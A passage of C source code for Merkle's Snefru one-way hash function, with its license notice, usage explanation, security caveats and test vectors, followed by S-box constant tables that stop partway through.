License is also granted to make and use derivative works provided that such works are identified as "derived from the Xerox Secure Hash Function" in all material mentioning or referencing the derived work. Xerox Corporation makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. These notices must be retained in any copies of any part of this software. Updated information about Snefru is available from arisia.xerox.com in directory /pub/hash by anonymous FTP. The README file provides a quick introduction. This is version 2.5a, November 29, 1990. Version 2.5a provides a reasonably understandable and efficient implementation of Snefru. Further, this version provides 8 passes. While 4 pass Snefru has not been broken, the use of 4 pass Snefru for production use is not recommended at this time. Further study of the security of Snefru is required before production use is advisable. This program reads from the standard input until EOF is reached (the first "read" that returns 0 bytes). The data on the standard input is "hashed" with a cryptographically secure one-way hash function (also known as a "message digest", "fingerprint", "Manipulation Detection Code" or "MDC"). The hash is then printed on the standard output. The input can be of any size. The output is 128 bits printed as 32 characters in hex. The output size can be changed to 256 bits be setting the parameter OUTPUT_BLOCK_SIZE to 8. (The 8 indicates the number of 32-bit words in the output). The primary use of one-way hash functions is to determine if there have been any unauthorized, malicious, or accidental changes made to a file. For example, if an executable program file produces the hash "209884c4 2e89d967 5456ac0e 61269550", then any change to that program file will cause the hash to be changed. 
Thus, the tampering can be detected by comparing the current output value with the previously computed (and presumably correct) output value. Hash512 is the centrol routine in this program. It is used in this program in a linear fashion -- i.e., a sequential file is hashed down by repeated applications of Hash512. Changing a single bit in the file would then require completely re-computing the hash from the point of change onward. Hash512 can be used in a tree-structured fashion to authenticate a large table of data. This would imply that changing a single bit would not force a complete re-computation of the hash value, but would instead require only log n re-computations of Hash512 to "patch up" the changes along the path from the root to the changed leaf entry. A tree-structured application also has the advantage that any single entry in the table can subsequently be authenticated by someone who knows only the "authentication path" from the root of the tree to the leaf entry. These concepts are discussed more thoroughly in "Secrecy, Authentication, and Public Key Systems" by Ralph C. Merkle, UMI Research Press, 1982 (see particularly Chapter 2, "One Way Hash Functions"). The use of a tree-structured pattern of applications of a one-way hash function is covered by U.S. Patent #4,309,569, "Method of Providing Digital Signatures" (contact Stanford University, Office of Technology Licensing). At the present time (November 29, 1990) the author knows of no method for "breaking" this one-way function, (i.e., finding two input files that produce the same output value). We recommend against the use of output sizes smaller than 128 bits, and against the use of an input that is less than 2 (two) words larger than the size of the output. When the input size equals the output size, Snefru suffers a serious degradation in security (an observation due to Coppersmith). Further study and validation of the security of Snefru is required prior to production use. 
If anyone using this program finds two different inputs that produce the same output, please contact Ralph C. Merkle via E-mail (merkle@xerox.com) or via normal mail at: Xerox PARC 3333 Coyote Hill Road Palo Alto, CA 94304 (415) 494-4000 See the paper "A Fast Software One Way Hash Function" by Ralph C. Merkle, to appear in The Journal of Cryptology, for a more detailed explanation. The following test cases were taken directly from a terminal, and can be used to verify the correct functioning of an implementation of Snefru. The first input is simply a carriage return followed by control-d. The second input is "1" followed by carriage return followed by control-d, the third input is "12" followed by carriage return followed by control-d, etc. (In some cases, two control-d's will be required). Note that the test cases given are from 8-pass Snefru (e.g., SECURITY_LEVEL=8) % ./snefru d9fcb317 1c097fbb a8c8f12a a0906bad % ./snefru 1 44ec420c e99c1f62 feb66c53 c24ae453 % ./snefru 12 7182051a a852ef6f ba4b6c9c 9b79b317 % ./snefru 123 bc3a50af 82bf56d6 a64732bc 7b050a93 % ./snefru 1234 c5b8a049 85a8eadf b4331a89 88752b77 % ./snefru 12345 d559a2b6 2f6f4411 1324f852 08723707 % ./snefru 123456 6cfb5e8f 1da02bd1 67b01e48 16686c30 % ./snefru 1234567 29aa4832 5f275a8a 7a01ba15 43c54ba5 % ./snefru 12345678 be862a6b 68b7df88 7ebe0031 9cbc4a47 % ./snefru 123456789 6103721c cd8ad565 d68e90b0 f8906163 % The following outputs were obtained after the program was compiled with OUTPUT_BLOCK_SIZE set to 8. 
This can be done by using the -D option on cc, as: cc -o snefru256 -DOUTPUT_BLOCK_SIZE=8 snefru.c Note that the test cases given are from 8-pass Snefru (e.g., SECURITY_LEVEL=8) % ./snefru256 2e02687f 0d45d5b9 b50cb68c 3f33e684 3d618a1a ca2d0689 3d3eb4e3 026b5732 % ./snefru256 1 bfea4a05 a2a2ef15 c736d114 598a20b9 d9bd4d66 b661e6b0 5ecf6a77 37bdc58c % ./snefru256 12 ac677d69 761ade3f 189c7aef 106d5fe7 392d324e 19cc76d5 db4a2c05 f2cc2cc5 % ./snefru256 123 061c76aa 1db4a22c 0e42945e 26c48499 b5400162 e08c640b e05d3c00 7c44793d % ./snefru256 1234 1e87fe1d 9c927e9e 24be85e3 cc733598 73541640 a6261793 ce5a9749 53113f5e % ./snefru256 12345 1b59927d 85a9349a 87796620 fe2ff401 a06a7ba4 8794498e bab978ef c3a68912 % ./snefru256 123456 28e9d9bc 35032b68 faeda881 01ecb252 4317e9da 111b0e3e 70941072 12d9cf72 % ./snefru256 1234567 f7fff4ee 74fd1b8d 6b3267f8 4e47e007 f029d13b 8af7e37e 34d13b46 9b8f248f % ./snefru256 12345678 ee7d64b0 102b2205 e9892661 3b200185 559d08be 6ad787da 717c9687 44e11af3 % ./snefru256 123456789 4ca72639 e40e9ab9 c0c3f523 c4449b39 11632d37 4c124d77 02192ec2 e4e0b7a3 % Note that "word32" MUST be 32 bits Implementor: Ralph C. Merkle */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #ifdef STRINGH #include #else #include #endif #include "../../include/sigs.h" #include "../../include/byteorder.h" #define INPUT_BLOCK_SIZE 16 /* size in 32-bit words of an input block to * the hash routine */ /* * OUTPUT_BLOCK_SIZE may be set to either 4 or 8. 8 should provide * a higher level of security (if we presume Snefru can only be broken * by a brute force attack, than an output size of 8 words or 256 bits * would require some 2**128 operations to break). The default is 4. * This parameter can be changed with the -DOUTPUT_BLOCK_SIZE=8 * command line option to the C compiler. 
*/ #ifndef OUTPUT_BLOCK_SIZE #define OUTPUT_BLOCK_SIZE 4 /* size in 32-bit words of an output block * from the hash routine */ #endif #define CHUNK_SIZE (INPUT_BLOCK_SIZE - OUTPUT_BLOCK_SIZE) /* generate a mask with log-to-the-base-2(INPUT_BLOCK_SIZE) "1" bits */ #define MASK (INPUT_BLOCK_SIZE - 1) #define round(L,C,N,SB) SBE=SB[C&0xffL];L^=SBE;N^=SBE #define rotate(B) B=(B>>shift) | (B< command * line option to the C compiler. */ #ifndef SECURITY_LEVEL #define SECURITY_LEVEL 8 #endif #define MAX_SBOX_COUNT 16 /* Identify this version for the "what" command */ char ident[] ="@(#) Snefru Version 2.5a November 29, 1990"; #if defined(TW_TYPE32) typedef unsigned TW_TYPE32 word32; #else typedef unsigned long int word32; #endif /* The standard S-Box */ word32 standardSBoxes[MAX_SBOX_COUNT][256]= { { /* Start of S Box 0 */ /* 0*/ 0x64f9001bL,0xfeddcdf6L,0x7c8ff1e2L,0x11d71514L,0x8b8c18d3L, /* 5*/ 0xdddf881eL,0x6eab5056L,0x88ced8e1L,0x49148959L,0x69c56fd5L, /* 10*/ 0xb7994f03L,0x0fbcee3eL,0x3c264940L,0x21557e58L,0xe14b3fc2L, /* 15*/ 0x2e5cf591L,0xdceff8ceL,0x092a1648L,0xbe812936L,0xff7b0c6aL, /* 20*/ 0xd5251037L,0xafa448f1L,0x7dafc95aL,0x1ea69c3fL,0xa417abe7L, /* 25*/ 0x5890e423L,0xb0cb70c0L,0xc85025f7L,0x244d97e3L,0x1ff3595fL, /* 30*/ 0xc4ec6396L,0x59181e17L,0xe635b477L,0x354e7dbfL,0x796f7753L, /* 35*/ 0x66eb52ccL,0x77c3f995L,0x32e3a927L,0x80ccaed6L,0x4e2be89dL, /* 40*/ 0x375bbd28L,0xad1a3d05L,0x2b1b42b3L,0x16c44c71L,0x4d54bfa8L, /* 45*/ 0xe57ddc7aL,0xec6d8144L,0x5a71046bL,0xd8229650L,0x87fc8f24L, /* 50*/ 0xcbc60e09L,0xb6390366L,0xd9f76092L,0xd393a70bL,0x1d31a08aL, /* 55*/ 0x9cd971c9L,0x5c1ef445L,0x86fab694L,0xfdb44165L,0x8eaafcbeL, /* 60*/ 0x4bcac6ebL,0xfb7a94e5L,0x5789d04eL,0xfa13cf35L,0x236b8da9L, /* 65*/ 0x4133f000L,0x6224261cL,0xf412f23bL,0xe75e56a4L,0x30022116L, /* 70*/ 0xbaf17f1fL,0xd09872f9L,0xc1a3699cL,0xf1e802aaL,0x0dd145dcL, /* 75*/ 0x4fdce093L,0x8d8412f0L,0x6cd0f376L,0x3de6b73dL,0x84ba737fL, /* 80*/ 0xb43a30f2L,0x44569f69L,0x00e4eacaL,0xb58de3b0L,0x959113c8L, 
/* 85*/ 0xd62efee9L,0x90861f83L,0xced69874L,0x2f793ceeL,0xe8571c30L, /* 90*/ 0x483665d1L,0xab07b031L,0x914c844fL,0x15bf3be8L,0x2c3f2a9aL, /* 95*/ 0x9eb95fd4L,0x92e7472dL,0x2297cc5bL,0xee5f2782L,0x5377b562L, /* 100*/ 0xdb8ebbcfL,0xf961deddL,0xc59b5c60L,0x1bd3910dL,0x26d206adL, /* 105*/ 0xb28514d8L,0x5ecf6b52L,0x7fea78bbL,0x504879acL,0xed34a884L, /* 110*/ 0x36e51d3cL,0x1753741dL,0x8c47caedL,0x9d0a40efL,0x3145e221L, /* 115*/ 0xda27eb70L,0xdf730ba3L,0x183c8789L,0x739ac0a6L,0x9a58dfc6L, /* 120*/ 0x54b134c1L,0xac3e242eL,0xcc493902L,0x7b2dda99L,0x8f15bc01L, /* 125*/ 0x29fd38c7L,0x27d5318fL,0x604aaff5L,0xf29c6818L,0xc38aa2ecL, /* 130*/ 0x1019d4c3L,0xa8fb936eL,0x20ed7b39L,0x0b686119L,0x89a0906fL, /* 135*/ 0x1cc7829eL,0x9952ef4bL,0x850e9e8cL,0xcd063a90L,0x67002f8eL, /* 140*/ 0xcfac8cb7L,0xeaa24b11L,0x988b4e6cL,0x46f066dfL,0xca7eec08L, /* 145*/ 0xc7bba664L,0x831d17bdL,0x63f575e6L,0x9764350eL,0x47870d42L, /* 150*/ 0x026ca4a2L,0x8167d587L,0x61b6adabL,0xaa6564d2L,0x70da237bL, /* 155*/ 0x25e1c74aL,0xa1c901a0L,0x0eb0a5daL,0x7670f741L,0x51c05aeaL, /* 160*/ 0x933dfa32L,0x0759ff1aL,0x56010ab8L,0x5fdecb78L,0x3f32edf8L, /* 165*/ 0xaebedbb9L,0x39f8326dL,0xd20858c5L,0x9b638be4L,0xa572c80aL, /* 170*/ 0x28e0a19fL,0x432099fcL,0x3a37c3cdL,0xbf95c585L,0xb392c12aL, /* 175*/ 0x6aa707d7L,0x52f66a61L,0x12d483b1L,0x96435b5eL,0x3e75802bL, /* 180*/ 0x3ba52b33L,0xa99f51a5L,0xbda1e157L,0x78c2e70cL,0xfcae7ce0L, /* 185*/ 0xd1602267L,0x2affac4dL,0x4a510947L,0x0ab2b83aL,0x7a04e579L, /* 190*/ 0x340dfd80L,0xb916e922L,0xe29d5e9bL,0xf5624af4L,0x4ca9d9afL, /* 195*/ 0x6bbd2cfeL,0xe3b7f620L,0xc2746e07L,0x5b42b9b6L,0xa06919bcL, /* 200*/ 0xf0f2c40fL,0x72217ab5L,0x14c19df3L,0xf3802daeL,0xe094beb4L, /* 205*/ 0xa2101affL,0x0529575dL,0x55cdb27cL,0xa33bddb2L,0x6528b37dL, /* 210*/ 0x740c05dbL,0xe96a62c4L,0x40782846L,0x6d30d706L,0xbbf48e2cL, /* 215*/ 0xbce2d3deL,0x049e37faL,0x01b5e634L,0x2d886d8dL,0x7e5a2e7eL, /* 220*/ 0xd7412013L,0x06e90f97L,0xe45d3ebaL,0xb8ad3386L,0x13051b25L, /* 225*/ 
0x0c035354L,0x71c89b75L,0xc638fbd0L,0x197f11a1L,0xef0f08fbL, /* 230*/ 0xf8448651L,0x38409563L,0x452f4443L,0x5d464d55L,0x03d8764cL, /* 235*/ 0xb1b8d638L,0xa70bba2fL,0x94b3d210L,0xeb6692a7L,0xd409c2d9L, /* 240*/ 0x68838526L,0xa6db8a15L,0x751f6c98L,0xde769a88L,0xc9ee4668L, /* 245*/ 0x1a82a373L,0x0896aa49L,0x42233681L,0xf62c55cbL,0x9f1c5404L, /* 250*/ 0xf74fb15cL,0xc06e4312L,0x6ffe5d72L,0x8aa8678bL,0x337cd129L, /* 255*/ 0x8211cefdL /* End of S Box 0 */ }, { /* Start of S Box 1 */ /* 0*/ 0x074a1d09L,0x52a10e5aL,0x9275a3f8L,0x4b82506cL,0x37df7e1bL, /* 5*/ 0x4c78b3c5L,0xcefab1daL,0xf472267eL,0xb63045f6L,0xd66a1fc0L, /* 10*/ 0x400298e3L,0x27e60c94L,0x87d2f1b8L,0xdf9e56ccL,0x45cd1803L, /* 15*/ 0x1d35e098L,0xcce7c736L,0x03483bf1L,0x1f7307d7L,0xc6e8f948L, /* 20*/ 0xe613c111L,0x3955c6ffL,0x1170ed7cL,0x8e95da41L,0x99c31bf4L, /* 25*/ 0xa4da8021L,0x7b5f94fbL,0xdd0da51fL,0x6562aa77L,0x556bcb23L, /* 30*/ 0xdb1bacc6L,0x798040b9L,0xbfe5378fL,0x731d55e6L,0xdaa5bfeeL, /* 35*/ 0x389bbc60L,0x1b33fba4L,0x9c567204L,0x36c26c68L,0x77ee9d69L, /* 40*/ 0x8aeb3e88L,0x2d50b5ceL,0x9579e790L,0x42b13cfcL,0x33fbd32bL, /* 45*/ 0xee0503a7L,0xb5862824L,0x15e41eadL,0xc8412ef7L,0x9d441275L, /* 50*/ 0x2fcec582L,0x5ff483b7L,0x8f3931dfL,0x2e5d2a7bL,0x49467bf9L, /* 55*/ 0x0653dea9L,0x2684ce35L,0x7e655e5cL,0xf12771d8L,0xbb15cc67L, /* 60*/ 0xab097ca1L,0x983dcf52L,0x10ddf026L,0x21267f57L,0x2c58f6b4L, /* 65*/ 0x31043265L,0x0bab8c01L,0xd5492099L,0xacaae619L,0x944ce54aL, /* 70*/ 0xf2d13d39L,0xadd3fc32L,0xcda08a40L,0xe2b0d451L,0x9efe08aeL, /* 75*/ 0xb9d50fd2L,0xea5cd7fdL,0xc9a749ddL,0x13ea2253L,0x832debaaL, /* 80*/ 0x24be640fL,0xe03e926aL,0x29e01cdeL,0x8bf59f18L,0x0f9d00b6L, /* 85*/ 0xe1238b46L,0x1e7d8e34L,0x93619adbL,0x76b32f9fL,0xbd972cecL, /* 90*/ 0xe31fa976L,0xa68fbb10L,0xfb3ba49dL,0x8587c41dL,0xa5add1d0L, /* 95*/ 0xf3cf84bfL,0xd4e11150L,0xd9ffa6bcL,0xc3f6018cL,0xaef10572L, /* 100*/ 0x74a64b2fL,0xe7dc9559L,0x2aae35d5L,0x5b6f587fL,0xa9e353feL, /* 105*/ 0xca4fb674L,0x04ba24a8L,0xe5c6875fL,0xdcbc6266L,0x6bc5c03fL, 
/* 110*/ 0x661eef02L,0xed740babL,0x058e34e4L,0xb7e946cfL,0x88698125L, /* 115*/ 0x72ec48edL,0xb11073a3L,0xa13485ebL,0xa2a2429cL,0xfa407547L, /* 120*/ 0x50b76713L,0x5418c37dL,0x96192da5L,0x170bb04bL,0x518a021eL, /* 125*/ 0xb0ac13d1L,0x0963fa2aL,0x4a6e10e1L,0x58472bdcL,0xf7f8d962L, /* 130*/ 0x979139eaL,0x8d856538L,0xc0997042L,0x48324d7aL,0x447623cbL, /* 135*/ 0x8cbbe364L,0x6e0c6b0eL,0xd36d63b0L,0x3f244c84L,0x3542c971L, /* 140*/ 0x2b228dc1L,0xcb0325bbL,0xf8c0d6e9L,0xde11066bL,0xa8649327L, /* 145*/ 0xfc31f83eL,0x7dd80406L,0xf916dd61L,0xd89f79d3L,0x615144c2L, /* 150*/ 0xebb45d31L,0x28002958L,0x56890a37L,0xf05b3808L,0x123ae844L, /* 155*/ 0x86839e16L,0x914b0d83L,0xc506b43cL,0xcf3cba5eL,0x7c60f5c9L, /* 160*/ 0x22deb2a0L,0x5d9c2715L,0xc77ba0efL,0x4f45360bL,0xc1017d8bL, /* 165*/ 0xe45adc29L,0xa759909bL,0x412cd293L,0xd7d796b1L,0x00c8ff30L, /* 170*/ 0x23a34a80L,0x4ec15c91L,0x714e78b5L,0x47b9e42eL,0x78f3ea4dL, /* 175*/ 0x7f078f5bL,0x346c593aL,0xa3a87a1aL,0x9bcbfe12L,0x3d439963L, /* 180*/ 0xb2ef6d8eL,0xb8d46028L,0x6c2fd5caL,0x62675256L,0x01f2a2f3L, /* 185*/ 0xbc96ae0aL,0x709a8920L,0xb4146e87L,0x6308b9e2L,0x64bda7baL, /* 190*/ 0xafed6892L,0x6037f2a2L,0xf52969e0L,0x0adb43a6L,0x82811400L, /* 195*/ 0x90d0bdf0L,0x19c9549eL,0x203f6a73L,0x1accaf4fL,0x89714e6dL, /* 200*/ 0x164d4705L,0x67665f07L,0xec206170L,0x0c2182b2L,0xa02b9c81L, /* 205*/ 0x53289722L,0xf6a97686L,0x140e4179L,0x9f778849L,0x9a88e15dL, /* 210*/ 0x25cadb54L,0xd157f36fL,0x32a421c3L,0xb368e98aL,0x5a92cd0dL, /* 215*/ 0x757aa8d4L,0xc20ac278L,0x08b551c7L,0x849491e8L,0x4dc75ad6L, /* 220*/ 0x697c33beL,0xbaf0ca33L,0x46125b4eL,0x59d677b3L,0x30d9c8f2L, /* 225*/ 0xd0af860cL,0x1c7fd0faL,0xfe0ff72cL,0x5c8d6f43L,0x57fdec3bL, /* 230*/ 0x6ab6ad97L,0xd22adf89L,0x18171785L,0x02bfe22dL,0x6db80917L, /* 235*/ 0x80b216afL,0xe85e4f9aL,0x7a1c306eL,0x6fc49bf5L,0x3af7a11cL, /* 240*/ 0x81e215e7L,0x68363fcdL,0x3e9357c8L,0xef52fd55L,0x3b8bab4cL, /* 245*/ 0x3c8cf495L,0xbefceebdL,0xfd25b714L,0xc498d83dL,0x0d2e1a8dL, /* 250*/ 
0xe9f966acL,0x0e387445L,0x435419e5L,0x5e7ebec4L,0xaa90b8d9L, /* 255*/ 0xff1a3a96L /* End of S Box 1 */ }, { /* Start of S Box 2 */ /* 0*/ 0x4a8fe4e3L,0xf27d99cdL,0xd04a40caL,0xcb5ff194L,0x3668275aL, /* 5*/ 0xff4816beL,0xa78b394cL,0x4c6be9dbL,0x4eec38d2L,0x4296ec80L, /* 10*/ 0xcdce96f8L,0x888c2f38L,0xe75508f5L,0x7b916414L,0x060aa14aL, /* 15*/ 0xa214f327L,0xbe608dafL,0x1ebbdec2L,0x61f98ce9L,0xe92156feL, /* 20*/ 0x4f22d7a3L,0x3f76a8d9L,0x559a4b33L,0x38ad2959L,0xf3f17e9eL, /* 25*/ 0x85e1ba91L,0xe5eba6fbL,0x73dcd48cL,0xf5c3ff78L,0x481b6058L, /* 30*/ 0x8a3297f7L,0x8f1f3bf4L,0x93785ab2L,0x477a4a5bL,0x6334eb5dL, /* 35*/ 0x6d251b2eL,0x74a9102dL,0x07e38ffaL,0x915c9c62L,0xccc275eaL, /* 40*/ 0x6be273ecL,0x3ebddd70L,0xd895796cL,0xdc54a91bL,0xc9afdf81L, /* 45*/ 0x23633f73L,0x275119b4L,0xb19f6b67L,0x50756e22L,0x2bb152e2L, /* 50*/ 0x76ea46a2L,0xa353e232L,0x2f596ad6L,0x0b1edb0bL,0x02d3d9a4L, /* 55*/ 0x78b47843L,0x64893e90L,0x40f0caadL,0xf68d3ad7L,0x46fd1707L, /* 60*/ 0x1c9c67efL,0xb5e086deL,0x96ee6ca6L,0x9aa34774L,0x1ba4f48aL, /* 65*/ 0x8d01abfdL,0x183ee1f6L,0x5ff8aa7aL,0x17e4faaeL,0x303983b0L, /* 70*/ 0x6c08668bL,0xd4ac4382L,0xe6c5849fL,0x92fefb53L,0xc1cac4ceL, /* 75*/ 0x43501388L,0x441118cfL,0xec4fb308L,0x53a08e86L,0x9e0fe0c5L, /* 80*/ 0xf91c1525L,0xac45be05L,0xd7987cb5L,0x49ba1487L,0x57938940L, /* 85*/ 0xd5877648L,0xa958727fL,0x58dfe3c3L,0xf436cf77L,0x399e4d11L, /* 90*/ 0xf0a5bfa9L,0xef61a33bL,0xa64cac60L,0x04a8d0baL,0x030dd572L, /* 95*/ 0xb83d320fL,0xcab23045L,0xe366f2f0L,0x815d008dL,0xc897a43aL, /* 100*/ 0x1d352df3L,0xb9cc571dL,0x8bf38744L,0x72209092L,0xeba124ebL, /* 105*/ 0xfb99ce5eL,0x3bb94293L,0x28da549cL,0xaab8a228L,0xa4197785L, /* 110*/ 0x33c70296L,0x25f6259bL,0x5c85da21L,0xdf15bdeeL,0x15b7c7e8L, /* 115*/ 0xe2abef75L,0xfcc19bc1L,0x417ff868L,0x14884434L,0x62825179L, /* 120*/ 0xc6d5c11cL,0x0e4705dcL,0x22700de0L,0xd3d2af18L,0x9be822a0L, /* 125*/ 0x35b669f1L,0xc42bb55cL,0x0a801252L,0x115bf0fcL,0x3cd7d856L, /* 130*/ 0xb43f5f9dL,0xc2306516L,0xa1231c47L,0xf149207eL,0x5209a795L, 
/* 135*/ 0x34b3ccd8L,0x67aefe54L,0x2c83924eL,0x6662cbacL,0x5eedd161L, /* 140*/ 0x84e681aaL,0x5d57d26bL,0xfa465cc4L,0x7e3ac3a8L,0xbf7c0cc6L, /* 145*/ 0xe18a9aa1L,0xc32f0a6fL,0xb22cc00dL,0x3d280369L,0x994e554fL, /* 150*/ 0x68f480d3L,0xadcff5e6L,0x3a8eb265L,0x83269831L,0xbd568a09L, /* 155*/ 0x4bc8ae6aL,0x69f56d2bL,0x0f17eac8L,0x772eb6c7L,0x9f41343cL, /* 160*/ 0xab1d0742L,0x826a6f50L,0xfea2097cL,0x1912c283L,0xce185899L, /* 165*/ 0xe4444839L,0x2d8635d5L,0x65d0b1ffL,0x865a7f17L,0x326d9fb1L, /* 170*/ 0x59e52820L,0x0090ade1L,0x753c7149L,0x9ddd8b98L,0xa5a691daL, /* 175*/ 0x0d0382bbL,0x8904c930L,0x086cb000L,0x6e69d3bdL,0x24d4e7a7L, /* 180*/ 0x05244fd0L,0x101a5e0cL,0x6a947dcbL,0xe840f77bL,0x7d0c5003L, /* 185*/ 0x7c370f1fL,0x805245edL,0xe05e3d3fL,0x7906880eL,0xbabfcd35L, /* 190*/ 0x1a7ec697L,0x8c052324L,0x0c6ec8dfL,0xd129a589L,0xc7a75b02L, /* 195*/ 0x12d81de7L,0xd9be2a66L,0x1f4263abL,0xde73fdb6L,0x2a00680aL, /* 200*/ 0x56649e36L,0x3133ed55L,0x90fa0bf2L,0x2910a02aL,0x949d9d46L, /* 205*/ 0xa0d1dcddL,0xcfc9b7d4L,0xd2677be5L,0x95cb36b3L,0x13cd9410L, /* 210*/ 0xdbf73313L,0xb7c6e8c0L,0xf781414bL,0x510b016dL,0xb0de1157L, /* 215*/ 0xd6b0f62cL,0xbb074eccL,0x7f1395b7L,0xee792cf9L,0xea6fd63eL, /* 220*/ 0x5bd6938eL,0xaf02fc64L,0xdab57ab8L,0x8edb3784L,0x8716318fL, /* 225*/ 0x164d1a01L,0x26f26141L,0xb372e6b9L,0xf8fc2b06L,0x7ac00e04L, /* 230*/ 0x3727b89aL,0x97e9bca5L,0x9c2a742fL,0xbc3b1f7dL,0x7165b471L, /* 235*/ 0x609b4c29L,0x20925351L,0x5ae72112L,0x454be5d1L,0xc0ffb95fL, /* 240*/ 0xdd0ef919L,0x6f2d70c9L,0x0974c5bfL,0x98aa6263L,0x01d91e4dL, /* 245*/ 0x2184bb6eL,0x70c43c1eL,0x4d435915L,0xae7b8523L,0xb6fb06bcL, /* 250*/ 0x5431ee76L,0xfdbc5d26L,0xed77493dL,0xc5712ee4L,0xa8380437L, /* 255*/ 0x2eef261aL /* End of S Box 2 */ }, { /* Start of S Box 3 */ /* 0*/ 0x5a79392bL,0xb8af32c2L,0x41f7720aL,0x833a61ecL,0x13dfedacL, /* 5*/ 0xc4990bc4L,0xdc0f54bcL,0xfedd5e88L,0x80da1881L,0x4dea1afdL, /* 10*/ 0xfd402cc6L,0xae67cc7aL,0xc5238525L,0x8ea01254L,0xb56b9bd5L, /* 15*/ 
0x862fbd6dL,0xac8575d3L,0x6fba3714L,0xda7ebf46L,0x59cd5238L, /* 20*/ 0x8ac9dbfeL,0x353729fcL,0xe497d7f2L,0xc3ab84e0L,0xf05a114bL, /* 25*/ 0x7b887a75L,0xedc603ddL,0x5e6fe680L,0x2c84b399L,0x884eb1daL, /* 30*/ 0x1cb8c8bfL,0xaa51098aL,0xc862231cL,0x8bac2221L,0x21b387e5L, /* 35*/ 0x208a430dL,0x2a3f0f8bL,0xa5ff9cd2L,0x6012a2eaL,0x147a9ee7L, /* 40*/ 0xf62a501dL,0xb4b2e51aL,0x3ef3484cL,0xc0253c59L,0x2b82b536L, /* 45*/ 0x0aa9696bL,0xbe0c109bL,0xc70b7929L,0xce3e8a19L,0x2f66950eL, /* 50*/ 0x459f1c2cL,0xe68fb93dL,0xa3c3ff3eL,0x62b45c62L,0x300991cbL, /* 55*/ 0x01914c57L,0x7f7bc06aL,0x182831f5L,0xe7b74bcaL,0xfa50f6d0L, /* 60*/ 0x523caa61L,0xe3a7cf05L,0xe9e41311L,0x280a21d1L,0x6a4297e1L, /* 65*/ 0xf24dc67eL,0xfc3189e6L,0xb72bf34fL,0x4b1e67afL,0x543402ceL, /* 70*/ 0x79a59867L,0x0648e02aL,0x00a3ac17L,0xc6208d35L,0x6e7f5f76L, /* 75*/ 0xa45bb4beL,0xf168fa63L,0x3f4125f3L,0xf311406fL,0x02706565L, /* 80*/ 0xbfe58022L,0x0cfcfdd9L,0x0735a7f7L,0x8f049092L,0xd98edc27L, /* 85*/ 0xf5c5d55cL,0xe0f201dbL,0x0dcafc9aL,0x7727fb79L,0xaf43abf4L, /* 90*/ 0x26e938c1L,0x401b26a6L,0x900720faL,0x2752d97bL,0xcff1d1b3L, /* 95*/ 0xa9d9e424L,0x42db99abL,0x6cf8be5fL,0xe82cebe3L,0x3afb733bL, /* 100*/ 0x6b734eb6L,0x1036414aL,0x975f667cL,0x049d6377L,0xba587c60L, /* 105*/ 0xb1d10483L,0xde1aefccL,0x1129d055L,0x72051e91L,0x6946d623L, /* 110*/ 0xf9e86ea7L,0x48768c00L,0xb0166c93L,0x9956bbf0L,0x1f1f6d84L, /* 115*/ 0xfb15e18eL,0x033b495dL,0x56e3362eL,0x4f44c53cL,0x747cba51L, /* 120*/ 0x89d37872L,0x5d9c331bL,0xd2ef9fa8L,0x254917f8L,0x1b106f47L, /* 125*/ 0x37d75553L,0xb3f053b0L,0x7dccd8efL,0xd30eb802L,0x5889f42dL, /* 130*/ 0x610206d7L,0x1a7d34a1L,0x92d87dd8L,0xe5f4a315L,0xd1cf0e71L, /* 135*/ 0xb22dfe45L,0xb901e8ebL,0x0fc0ce5eL,0x2efa60c9L,0x2de74290L, /* 140*/ 0x36d0c906L,0x381c70e4L,0x4c6da5b5L,0x3d81a682L,0x7e381f34L, /* 145*/ 0x396c4f52L,0x95ad5901L,0x1db50c5aL,0x29982e9eL,0x1557689fL, /* 150*/ 0x3471ee42L,0xd7e2f7c0L,0x8795a1e2L,0xbc324d8dL,0xe224c3c8L, /* 155*/ 
0x12837e39L,0xcdee3d74L,0x7ad2143fL,0x0e13d40cL,0x78bd4a68L, /* 160*/ 0xa2eb194dL,0xdb9451f9L,0x859b71dcL,0x5c4f5b89L,0xca14a8a4L, /* 165*/ 0xef92f003L,0x16741d98L,0x33aa4444L,0x9e967fbbL,0x092e3020L, /* 170*/ 0xd86a35b8L,0x8cc17b10L,0xe1bf08aeL,0x55693fc5L,0x7680ad13L, /* 175*/ 0x1e6546e8L,0x23b6e7b9L,0xee77a4b2L,0x08ed0533L,0x44fd2895L, /* 180*/ 0xb6393b69L,0x05d6cacfL,0x9819b209L,0xecbbb72fL,0x9a75779cL, /* 185*/ 0xeaec0749L,0x94a65aeeL,0xbdf52dc3L,0xd6a25d04L,0x82008e4eL, /* 190*/ 0xa6de160fL,0x9b036afbL,0x228b3a66L,0x5fb10a70L,0xcc338b58L, /* 195*/ 0x5378a9dfL,0xc908bca9L,0x4959e25bL,0x46909a97L,0x66ae8f6eL, /* 200*/ 0xdd0683e9L,0x65f994b4L,0x6426cda5L,0xc24b8840L,0x32539da0L, /* 205*/ 0x63175650L,0xd0c815ffL,0x50cbc41eL,0xf7c774a3L,0x31b0c231L, /* 210*/ 0x8d0d8116L,0x24bef16cL,0xd555d256L,0xdf47ea8cL,0x6d21eccdL, /* 215*/ 0xa887a012L,0x84542aedL,0xa7b9c1bdL,0x914c1bb1L,0xa0d5b67dL, /* 220*/ 0x438ce937L,0x7030f873L,0x71f6b0c7L,0x574576baL,0xf8bc4541L, /* 225*/ 0x9c61d348L,0x1960579dL,0x17c4daadL,0x96a4cb0bL,0xc193f2f6L, /* 230*/ 0x756eafa2L,0x7c1d2f94L,0xf4fe2b43L,0xcb86e33aL,0xebd4c728L, /* 235*/ 0x9d18ae64L,0x9fe13e30L,0x3ce0f5deL,0xaba1f985L,0xaddc2718L, /* 240*/ 0x68ce6278L,0xd45e241fL,0xa15c82b7L,0x3b2293d4L,0x739edd32L, /* 245*/ 0x674a6bf1L,0x5b5d587fL,0x4772deaaL,0x4a63968fL,0x0be68686L, /* 250*/ 0x513d6426L,0x939a4787L,0xbba89296L,0x4ec20007L,0x818d0d08L, /* 255*/ 0xff64dfd6L /* End of S Box 3 */ }, { /* Start of S Box 4 */ /* 0*/ 0xcb2297cbL,0xdb48a144L,0xa16cbe4bL,0xbbea1d6cL,0x5af6b6b7L, /* 5*/ 0x8a8110b6L,0xf9236ef9L,0xc98f83e6L,0x0f9c65b8L,0x252d4a89L, /* 10*/ 0xa497f068L,0xa5d7ed2dL,0x94c22845L,0x9da1c8c4L,0xe27c2e2eL, /* 15*/ 